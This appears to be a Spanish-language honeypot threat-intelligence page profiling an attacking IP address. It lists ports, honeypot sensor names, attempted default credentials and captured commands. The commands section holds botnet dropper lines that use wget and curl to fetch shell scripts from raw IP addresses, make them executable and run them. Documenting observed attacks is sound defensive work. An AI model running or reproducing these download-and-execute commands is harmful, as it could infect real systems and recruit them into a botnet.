Amenaza ActivaCRITICO

64.89.161.198

Pais de Origen🇸🇬 Singapur
Primera Deteccion2/2/2026
Ultima Actividad23/2/2026
ISPOVH SAS
🎯
180
Ataques Totales
🔌
25
Puertos
📡
7
Tipos Ataque
🦠
5
Malware

Geolocalizacion

Pais
🇸🇬 Singapur
Ciudad
Desconocida
ASN
AS16276
ISP
OVH SAS

Tipos de Ataque

h0neytr4p
cowrie
honeyaml
dionaea
tanner
honeytrap
ciscoasa

Puertos Atacados

2380814431443300030013002300330043005300630073010312833014000400540634444+5

Malware Asociado

Credenciales Intentadas

🔐admin/admin
11x
🔐root/root
6x

Comandos Ejecutados

$echo MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here cd /tmp; rm -f cat.sh; rm -rf iran.*; wget http://188.214.30.5/r.sh -O r.sh; chmod 777 r.sh; ./r.sh2x
$echo SUCCESS2x
$echo MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.128.118.140/run.sh; curl -O http://45.128.118.140/run.sh; chmod 777 run.sh; sh run.sh; rm -rf run.sh1x
$echo MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here cd /tmp; rm -f cat.sh; rm -rf iran.*; wget http://188.214.30.5/r.sh -O r.sh; chmod 777 r.sh; ./r.sh telnet1x

Evaluacion de Riesgo

95
/100
BajoMedioAltoCritico